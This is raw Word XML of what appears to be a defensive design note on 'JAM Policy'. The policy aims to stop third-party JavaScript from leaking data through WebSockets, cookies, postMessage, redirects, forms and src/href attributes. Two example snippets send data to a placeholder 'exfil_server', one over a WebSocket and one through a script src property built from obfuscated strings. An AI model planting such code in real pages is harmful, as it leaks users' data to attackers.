    <w:p w14:paraId="7C337DB2" w14:textId="316B117F" w:rsidR="00DE61DC" w:rsidRDefault="001214F5" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>WebSockets allow bidirectiona</w:t>
      </w:r>
      <w:r w:rsidR="006C6EDD">
        <w:t xml:space="preserve">l client / server communication.  </w:t>
      </w:r>
      <w:r w:rsidR="000173BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00686C09">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="000835D4">
        <w:t>alicious JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00686C09">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005937DE">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="000835D4">
        <w:t xml:space="preserve">exifiltrate data in a straightforward way </w:t>
      </w:r>
      <w:r w:rsidR="00686C09">
        <w:t>to any malicious WebSocket server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DAF161" w14:textId="1A9844D1" w:rsidR="00686C09" w:rsidRDefault="00061AAF" w:rsidP="005E18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90902" wp14:editId="4874B034">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>228600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>264160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="50292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8FAC" w14:textId="2CE1E509" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                            <w:r>
                              <w:t xml:space="preserve">     var ws = new WebSocket("ws://</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00061AAF">
                              <w:rPr>
                                <w:i/>
                              </w:rPr>
                              <w:t>exfil_server</w:t>
                            </w:r>
                            <w:r>
                              <w:t>:9998/do_something");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0DE4A084" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                            <w:r>
                              <w:t xml:space="preserve">     ws.onopen = function()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59664CCC" w14:textId="546E2D44" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                            <w:r>
                              <w:t xml:space="preserve">     {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="449D17E8" w14:textId="3362966E" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                            <w:r>
                              <w:t xml:space="preserve">        ws.send(</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00061AAF">
                              <w:rPr>
                                <w:i/>
                              </w:rPr>
                              <w:t>exfil_msg</w:t>
                            </w:r>
                            <w:r>
                              <w:t>);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0817C616" w14:textId="5F597001" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                            <w:r>
                              <w:t xml:space="preserve">    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pt;margin-top:20.8pt;width:396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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5D908FAC" w14:textId="2CE1E509" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                      <w:r>
                        <w:t xml:space="preserve">     var ws = new WebSocket("ws://</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00061AAF">
                        <w:rPr>
                          <w:i/>
                        </w:rPr>
                        <w:t>exfil_server</w:t>
                      </w:r>
                      <w:r>
                        <w:t>:9998/do_something");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0DE4A084" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                      <w:r>
                        <w:t xml:space="preserve">     ws.onopen = function()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="59664CCC" w14:textId="546E2D44" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                      <w:r>
                        <w:t xml:space="preserve">     {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="449D17E8" w14:textId="3362966E" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                      <w:r>
                        <w:t xml:space="preserve">        ws.send(</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00061AAF">
                        <w:rPr>
                          <w:i/>
                        </w:rPr>
                        <w:t>exfil_msg</w:t>
                      </w:r>
                      <w:r>
                        <w:t>);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0817C616" w14:textId="5F597001" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00061AAF">
                      <w:r>
                        <w:t xml:space="preserve">    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7AAAC" w14:textId="77777777" w:rsidR="00AF529B" w:rsidRDefault="00AF529B" w:rsidP="00AF529B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702B89E2" w14:textId="77777777" w:rsidR="00AF529B" w:rsidRDefault="00AF529B" w:rsidP="00AF529B"/>
    <w:p w14:paraId="7AE33F7D" w14:textId="6CE7CD6A" w:rsidR="00AF529B" w:rsidRDefault="00AF529B" w:rsidP="00A92EF5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because of self-exfiltration attacks, the browser’s same origin policy for cookies does not necessarily prevent data exfiltration via cookies.  </w:t>
      </w:r>
      <w:r w:rsidR="00C4687D">
        <w:t>For example, suppose a user Alice logs into a website which includes malicious JavaScipt as part of a third-party widget</w:t>
      </w:r>
      <w:r w:rsidR="00CE5372">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00C4687D">
        <w:t xml:space="preserve"> steal</w:t>
      </w:r>
      <w:r w:rsidR="00CE5372">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C4687D">
        <w:t xml:space="preserve"> Alice’s cookie.   </w:t>
      </w:r>
      <w:r w:rsidR="004B5DEA">
        <w:t>Suppose the cookie has a user name followed by a secret value.  The malicious JavaScript can change the username of the cookie to Mallory.  Next time Mallory logs in his cookie will have Alice’s secret value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52B48A" w14:textId="02E505D3" w:rsidR="00E5415A" w:rsidRDefault="00E5415A" w:rsidP="005E181F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Window.postMessage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D3483" w14:textId="77777777" w:rsidR="00E5415A" w:rsidRDefault="00E5415A" w:rsidP="005E181F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CAB4DA" w14:textId="5F514E5C" w:rsidR="005F725D" w:rsidRDefault="000350A4" w:rsidP="00017211">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Window.postMessage allows inter-origin communication between</w:t>
      </w:r>
      <w:r w:rsidR="00790A7B">
        <w:t xml:space="preserve"> two separate browser windows.  If one window is running sandboxed JavaScript but </w:t>
      </w:r>
      <w:r w:rsidR="0002160B">
        <w:t>another window is not.  The malicious JavaScript can pass messages to the non-sandboxed wind</w:t>
      </w:r>
      <w:r w:rsidR="008A1950">
        <w:t>ow by using postMessage if</w:t>
      </w:r>
      <w:r w:rsidR="0002160B">
        <w:t xml:space="preserve"> the non-sandboxed window </w:t>
      </w:r>
      <w:r w:rsidR="00B52DD6">
        <w:t>listens for</w:t>
      </w:r>
      <w:r w:rsidR="0002160B">
        <w:t xml:space="preserve"> messag</w:t>
      </w:r>
      <w:r w:rsidR="00D92B9E">
        <w:t xml:space="preserve">es from the postMessage queue.   The attacker must assume that the user has another window open that listens for </w:t>
      </w:r>
      <w:r w:rsidR="003D1D30">
        <w:t xml:space="preserve">messages in order for this technique to be successful.  </w:t>
      </w:r>
      <w:r w:rsidR="00CA26CA">
        <w:t xml:space="preserve">Thus the technique has limited effectiveness but should still be blocked in order to be </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F22">
        <w:t>thorough</w:t>
      </w:r>
      <w:r w:rsidR="00CA26CA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB923C" w14:textId="77777777" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00017211">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9B4160" w14:textId="77777777" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Redirects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6227D870" w14:textId="77777777" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960"/>
    <w:p w14:paraId="02B6906C" w14:textId="68F1A42D" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960">
      <w:r>
        <w:t>Redirecting to another page using Window.location can also leak information, for example through the url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CF20BB" w14:textId="77777777" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152760D5" w14:textId="77777777" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960"/>
    <w:p w14:paraId="1925F100" w14:textId="69C0B0C9" w:rsidR="00A15960" w:rsidRDefault="00A15960" w:rsidP="00A15960">
      <w:r>
        <w:t>Submitting forms can also leak information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AC25D" w14:textId="3A40B7EF" w:rsidR="00A13364" w:rsidRDefault="00F81E84" w:rsidP="002734F4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Generally dangerous operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D6CAF" w14:textId="77777777" w:rsidR="0056290F" w:rsidRDefault="0056290F" w:rsidP="0056290F"/>
    <w:p w14:paraId="35DF6C90" w14:textId="193F0CC7" w:rsidR="0056290F" w:rsidRPr="0056290F" w:rsidRDefault="0056290F" w:rsidP="0056290F">
      <w:r>
        <w:t>The eval operations should be disallowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB33E69" w14:textId="77777777" w:rsidR="002734F4" w:rsidRDefault="002734F4" w:rsidP="002734F4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implications of blocking network interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DF5B2" w14:textId="77777777" w:rsidR="002734F4" w:rsidRPr="0021634F" w:rsidRDefault="002734F4" w:rsidP="002734F4"/>
    <w:p w14:paraId="0577864F" w14:textId="2997AB71" w:rsidR="002734F4" w:rsidRDefault="002734F4" w:rsidP="002734F4">
      <w:r>
        <w:t xml:space="preserve">Blocking all network access may be too Draconian in many situations.  </w:t>
      </w:r>
      <w:r w:rsidR="00A271A3">
        <w:t xml:space="preserve"> For example, third-party scripts such as advertisements need to pull in images and redirect the user to merchant’s website.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2618D8" w14:textId="3F06406B" w:rsidR="000A2B4E" w:rsidRDefault="005263FC" w:rsidP="00491B9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>JAM Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E66D0" w14:textId="133B00D3" w:rsidR="00FA3066" w:rsidRDefault="00FA3066" w:rsidP="00FA3066">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Restricting DOM elements with src attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BEC764" w14:textId="77777777" w:rsidR="008D540B" w:rsidRDefault="008D540B" w:rsidP="002D1CDE"/>
    <w:p w14:paraId="3202010D" w14:textId="6E8E6CE0" w:rsidR="00893432" w:rsidRDefault="003F0CC2" w:rsidP="000C7B4E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Our concern with DOM elements with src attribute is that data captured on the client’s browser can be exfiltrated by </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C44">
        <w:t xml:space="preserve">using the URL specified in src attribute. </w:t>
      </w:r>
      <w:r w:rsidR="003106DF">
        <w:t xml:space="preserve">  Our proposed policy is to block elements with </w:t>
      </w:r>
      <w:r w:rsidR="00062175">
        <w:t>their src attribute set.  As a side effect, this p</w:t>
      </w:r>
      <w:r w:rsidR="00062746">
        <w:t>revents the use of images and other elements that require the src attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754780E" w14:textId="77777777" w:rsidR="00062746" w:rsidRDefault="00062746" w:rsidP="000C7B4E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D18EDC" w14:textId="0AD11248" w:rsidR="00945401" w:rsidRDefault="007969F9" w:rsidP="00846F5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="009C7783">
        <w:t>etermining whether JavaScript code actually accesses the src attribute or not</w:t>
      </w:r>
      <w:r w:rsidR="00BD4185">
        <w:t xml:space="preserve"> using static analysis</w:t>
      </w:r>
      <w:r w:rsidR="00BB717B">
        <w:t xml:space="preserve"> is not completely </w:t>
      </w:r>
      <w:r w:rsidR="00C325C7">
        <w:t>straightforward</w:t>
      </w:r>
      <w:r w:rsidR="009C7783">
        <w:t>.  As discussed in [2] this is in general a intractable problem since properties can be accessed by strings representing the property name, e.g, obj[“src”].  The problem is that it is difficult to determine what the property name string value actually is since this can be obfuscated by using a convoluted set of operations to derive the property name string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FC417" w14:textId="780A031B" w:rsidR="00505615" w:rsidRDefault="00505615" w:rsidP="00846F5F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB27913" w14:textId="33262A0E" w:rsidR="00505615" w:rsidRDefault="00505615" w:rsidP="00846F5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CD2F6" wp14:editId="3D5F3D17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>571500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>142240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="50292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A09E" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>var script = document.createElement('script');</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="79A80E0B" w14:textId="5A958AD1" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>pname = “s”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35FB6BAA" w14:textId="7AFEC7E7" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>pname = pname + “r”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B47DF02" w14:textId="2C6BA77F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>pname = pname + “c”</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="561D8466" w14:textId="66134122" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>script[pname] = http://exfil_server/exfil_message</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47575AF7" w14:textId="0BB6AA18" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                            <w:r>
                              <w:t>document.body.appendChild( script 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5pt;margin-top:11.2pt;width:39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" fillcolor="#dbe5f1 [660]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="210BA09E" w14:textId="77777777" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>var script = document.createElement('script');</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="79A80E0B" w14:textId="5A958AD1" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>pname = “s”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35FB6BAA" w14:textId="7AFEC7E7" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>pname = pname + “r”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B47DF02" w14:textId="2C6BA77F" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>pname = pname + “c”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="561D8466" w14:textId="66134122" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>script[pname] = http://exfil_server/exfil_message</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47575AF7" w14:textId="0BB6AA18" w:rsidR="002F48B1" w:rsidRDefault="002F48B1" w:rsidP="00505615">
                      <w:r>
                        <w:t>document.body.appendChild( script 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54BEA" w14:textId="77777777" w:rsidR="00BA11E9" w:rsidRDefault="00BA11E9" w:rsidP="00450592">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668E40D9" w14:textId="77777777" w:rsidR="00BA11E9" w:rsidRDefault="00BA11E9" w:rsidP="00450592">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5AB3CC" w14:textId="77777777" w:rsidR="00BA11E9" w:rsidRDefault="00BA11E9" w:rsidP="00BA11E9"/>
    <w:p w14:paraId="7FBD0E23" w14:textId="77777777" w:rsidR="00BA11E9" w:rsidRDefault="00BA11E9" w:rsidP="00BA11E9"/>
    <w:p w14:paraId="126508C7" w14:textId="1B80B595" w:rsidR="005D080A" w:rsidRPr="00BA11E9" w:rsidRDefault="00262400" w:rsidP="00BA11E9">
      <w:r>
        <w:t xml:space="preserve">Runtime checks that ensure that the argument to the </w:t>
      </w:r>
      <w:r w:rsidR="00F95C48">
        <w:t xml:space="preserve">[] operator is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:r w:rsidR="00895C86">
        <w:t xml:space="preserve">“src” </w:t>
      </w:r>
      <w:r w:rsidR="000C27BA">
        <w:t>should address this limitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C04A3" w14:textId="5FC0DDF3" w:rsidR="00A53088" w:rsidRDefault="00A53088" w:rsidP="00A53088">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Restricting DOM elements with href attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116FFB1" w14:textId="77777777" w:rsidR="00A53088" w:rsidRDefault="00A53088" w:rsidP="00F34CD7"/>
    <w:p w14:paraId="1A41A05B" w14:textId="157F3C7F" w:rsidR="00F34CD7" w:rsidRDefault="00F34CD7" w:rsidP="00F34CD7">
      <w:r>
        <w:t xml:space="preserve">The discussion for DOM elements with href attributes is largely the same as for elements with src attributes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F547AB" w14:textId="77777777" w:rsidR="00727006" w:rsidRDefault="00727006" w:rsidP="00F34CD7"/>
    <w:p w14:paraId="00AD26D3" w14:textId="45BA1F44" w:rsidR="00A406AF" w:rsidRDefault="00A406AF" w:rsidP="00A406AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Other methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6F0B5" w14:textId="77777777" w:rsidR="00A406AF" w:rsidRDefault="00A406AF" w:rsidP="00F34CD7"/>
    <w:p w14:paraId="104E3F92" w14:textId="08C11868" w:rsidR="00A406AF" w:rsidRDefault="00A406AF" w:rsidP="00F34CD7">
      <w:r>
        <w:t xml:space="preserve">WebSockets and XMLHTTPRequests can be prevented by disallowing creation of objects of those types.  </w:t>
      </w:r>
      <w:r w:rsidR="0064666E">
        <w:t xml:space="preserve">Window.postMessage can be prevented by </w:t>
      </w:r>
      <w:r w:rsidR="008B5F0D">
        <w:t xml:space="preserve">disallows calls to this function.  </w:t>
      </w:r>
      <w:r w:rsidR="000D7F62">
        <w:t xml:space="preserve">  Similarly Window.location can be prevented from being set to prevent redirects.  Form.submit can be blocked to prevent exfiltration via forms.  </w:t>
      </w:r>
      <w:r w:rsidR="00294886">
        <w:t>To prevent leaking information through cookies, writing data to cookies should be restricted.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00871BCC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434B6058" w14:textId="77BBE62F" w:rsidR="004B5A0C" w:rsidRDefault="004B5A0C" w:rsidP="002D1CDE"/>
    <w:p w14:paraId="5854E0D8" w14:textId="77777777" w:rsidR="00162DA3" w:rsidRDefault="00162DA3" w:rsidP="002D1CDE"/>
    <w:p w14:paraId="4B429503" w14:textId="1104B3B5" w:rsidR="00162DA3" w:rsidRDefault="00162DA3" w:rsidP="002D1CDE">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00162DA3">
        <w:t>Eric Yawei Chen, Sergey Gorbaty, Astha Singhal, and Collin Jackson</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00162DA3">
        <w:t>Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control</w:t>
      </w:r>
      <w:r>
        <w:t>.  Web 2.0 Security and Privacy 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3190C" w14:textId="77777777" w:rsidR="00162DA3" w:rsidRDefault="00162DA3" w:rsidP="002D1CDE"/>
    <w:p w14:paraId="7C6EF221" w14:textId="376E6F79" w:rsidR="00162DA3" w:rsidRPr="00FA23FA" w:rsidRDefault="002F48B1" w:rsidP="002D1CDE">
      <w:r>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="002621EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002621EF" w:rsidRPr="002621EF">
        <w:t xml:space="preserve">Sergio Maffeis </w:t>
      </w:r>
      <w:r w:rsidR="002621EF">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002621EF" w:rsidRPr="002621EF">
        <w:t>Ankur Taly</w:t>
      </w:r>
      <w:r w:rsidR="002621EF">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="002621EF" w:rsidRPr="002621EF">
        <w:t>Language-Based Isolation of Untrusted JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="002621EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00162DA3" w:rsidRPr="00FA23FA" w:rsidSect="006D28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0D"/>
    <w:rsid w:val="00017211"/>
    <w:rsid w:val="000173BC"/>
    <w:rsid w:val="0002160B"/>
    <w:rsid w:val="00025B78"/>
    <w:rsid w:val="000263D4"/>
    <w:rsid w:val="000350A4"/>
    <w:rsid w:val="00043ABB"/>
    <w:rsid w:val="000512FE"/>
    <w:rsid w:val="00052A46"/>
    <w:rsid w:val="00057FC5"/>
    <w:rsid w:val="00061AAF"/>
    <w:rsid w:val="00062175"/>
    <w:rsid w:val="00062234"/>
    <w:rsid w:val="00062746"/>
    <w:rsid w:val="00062D0C"/>
    <w:rsid w:val="00071969"/>
    <w:rsid w:val="000813F8"/>
    <w:rsid w:val="000835D4"/>
    <w:rsid w:val="00090A4F"/>
    <w:rsid w:val="000A2B4E"/>
    <w:rsid w:val="000A3469"/>
    <w:rsid w:val="000C27BA"/>
    <w:rsid w:val="000C7B4E"/>
    <w:rsid w:val="000C7CE6"/>
    <w:rsid w:val="000D1559"/>
    <w:rsid w:val="000D7F62"/>
    <w:rsid w:val="000E1A91"/>
    <w:rsid w:val="000E2CC1"/>
    <w:rsid w:val="000F65E2"/>
    <w:rsid w:val="001214F5"/>
    <w:rsid w:val="001230FF"/>
    <w:rsid w:val="001276FC"/>
    <w:rsid w:val="00127A8C"/>
    <w:rsid w:val="00140CFF"/>
    <w:rsid w:val="00141D5C"/>
    <w:rsid w:val="00142F3D"/>
    <w:rsid w:val="001622BA"/>
    <w:rsid w:val="00162DA3"/>
    <w:rsid w:val="00177204"/>
    <w:rsid w:val="00191BA3"/>
    <w:rsid w:val="001A356F"/>
    <w:rsid w:val="001B1FFC"/>
    <w:rsid w:val="001B5CB1"/>
    <w:rsid w:val="001C0F48"/>
    <w:rsid w:val="001C486E"/>
    <w:rsid w:val="001C7422"/>
    <w:rsid w:val="001D1056"/>
    <w:rsid w:val="001D61CC"/>
    <w:rsid w:val="001E57F8"/>
    <w:rsid w:val="001F0C19"/>
    <w:rsid w:val="001F72E0"/>
    <w:rsid w:val="00207218"/>
    <w:rsid w:val="00207F78"/>
    <w:rsid w:val="0021634F"/>
    <w:rsid w:val="00226055"/>
    <w:rsid w:val="00232F98"/>
    <w:rsid w:val="002508D8"/>
    <w:rsid w:val="002621EF"/>
    <w:rsid w:val="00262400"/>
    <w:rsid w:val="002734F4"/>
    <w:rsid w:val="00273995"/>
    <w:rsid w:val="00282D06"/>
    <w:rsid w:val="0028761E"/>
    <w:rsid w:val="00287917"/>
    <w:rsid w:val="00294886"/>
    <w:rsid w:val="00296C3A"/>
    <w:rsid w:val="002A0346"/>
    <w:rsid w:val="002A6F1A"/>
    <w:rsid w:val="002D1CDE"/>
    <w:rsid w:val="002D29B6"/>
    <w:rsid w:val="002E174D"/>
    <w:rsid w:val="002E36C1"/>
    <w:rsid w:val="002F48B1"/>
    <w:rsid w:val="00301B0D"/>
    <w:rsid w:val="003027FF"/>
    <w:rsid w:val="003106DF"/>
    <w:rsid w:val="00331D4D"/>
    <w:rsid w:val="00331EAD"/>
    <w:rsid w:val="00334D10"/>
    <w:rsid w:val="0034647A"/>
    <w:rsid w:val="003618D9"/>
    <w:rsid w:val="00366AAF"/>
    <w:rsid w:val="00387454"/>
    <w:rsid w:val="0039680D"/>
    <w:rsid w:val="003A06F3"/>
    <w:rsid w:val="003A2886"/>
    <w:rsid w:val="003B641B"/>
    <w:rsid w:val="003C080F"/>
    <w:rsid w:val="003D1D30"/>
    <w:rsid w:val="003D4675"/>
    <w:rsid w:val="003E0BEF"/>
    <w:rsid w:val="003E5D01"/>
    <w:rsid w:val="003F0B4B"/>
    <w:rsid w:val="003F0CC2"/>
    <w:rsid w:val="00410548"/>
    <w:rsid w:val="0041346A"/>
    <w:rsid w:val="00416901"/>
    <w:rsid w:val="00423452"/>
    <w:rsid w:val="0042614E"/>
    <w:rsid w:val="0044649C"/>
    <w:rsid w:val="00450304"/>
    <w:rsid w:val="0045056A"/>
    <w:rsid w:val="00450592"/>
    <w:rsid w:val="004658CC"/>
    <w:rsid w:val="0046628D"/>
    <w:rsid w:val="0047283F"/>
    <w:rsid w:val="00491B9B"/>
    <w:rsid w:val="004B5A0C"/>
    <w:rsid w:val="004B5DEA"/>
    <w:rsid w:val="004C340D"/>
    <w:rsid w:val="004C3CC7"/>
    <w:rsid w:val="004F3351"/>
    <w:rsid w:val="005021FC"/>
    <w:rsid w:val="00505615"/>
    <w:rsid w:val="005104BE"/>
    <w:rsid w:val="00521D38"/>
    <w:rsid w:val="005263FC"/>
    <w:rsid w:val="0052682E"/>
    <w:rsid w:val="005307F9"/>
    <w:rsid w:val="005316DB"/>
    <w:rsid w:val="0053465D"/>
    <w:rsid w:val="00540A3F"/>
    <w:rsid w:val="00542167"/>
    <w:rsid w:val="0054386E"/>
    <w:rsid w:val="00553B43"/>
    <w:rsid w:val="00557AA0"/>
    <w:rsid w:val="0056290F"/>
    <w:rsid w:val="005914B1"/>
    <w:rsid w:val="005937DE"/>
    <w:rsid w:val="005B0249"/>
    <w:rsid w:val="005C4705"/>
    <w:rsid w:val="005C76CD"/>
    <w:rsid w:val="005D080A"/>
    <w:rsid w:val="005D536B"/>
    <w:rsid w:val="005E181F"/>
    <w:rsid w:val="005E750E"/>
    <w:rsid w:val="005F061F"/>
    <w:rsid w:val="005F4F30"/>
    <w:rsid w:val="005F725D"/>
    <w:rsid w:val="00605BE0"/>
    <w:rsid w:val="00612CF6"/>
    <w:rsid w:val="006145D9"/>
    <w:rsid w:val="006212FB"/>
    <w:rsid w:val="00625ADF"/>
